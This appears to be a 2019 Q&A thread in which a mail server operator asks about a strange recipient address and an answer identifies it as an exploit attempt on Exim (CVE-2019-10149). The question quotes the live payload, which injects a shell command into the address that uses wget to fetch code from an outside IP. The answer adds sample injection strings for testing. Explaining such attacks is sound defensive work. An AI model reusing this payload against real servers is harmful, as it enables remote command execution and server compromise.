attack via executable line after plus sign in email address

3

1

I operate my own mail server and from time to time, people send spam or mysterious stuff to the root account. Recently, I got an empty mail, which was addressed to:

root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@mydomain.tld

The second IP address in that string seems to be owned by the same hosting service which I rent my server from. The run and wget look very suspicious to me but I found nothing about such an attack on the Internet.

According to the server's mail log, that mail was sent from 148.72.206.111. However, The From field was set to root@sab.com.

Does anyone know, what this means?

Ilka31415

Posted 2019-07-19T10:52:02.690

Reputation: 43

Answers

3

This is an attempt to exploit a recently discovered bug in the Exim4 SMTP server (v4.87 to v4.91), which would allow remote command execution as Exim would expand ${variable} substitutions in certain places that it really was not supposed to. (This syntax is broadly used in the main Exim configuration file.)

The bug is known as CVE-2019-10149 (it doesn't have a trademark name or logo yet). If you were using Exim4 from your distribution, you would already have received the patches. Since you're using Postfix, it doesn't affect you in the first place.

(That said, even in Postfix the parameter after the + is frequently used as part of a command line, e.g. when invoking Procmail. I would probably recommend doing a few tests against your own server to see how it handles things like someuser+$(blah)@ or someuser+`blah`@.)

user1686

Posted 2019-07-19T10:52:02.690

Reputation: 283 655

Asked: 2019-07-19T10:52:02.690

Viewed: 48 times

Active: 2019-07-19T11:05:56.533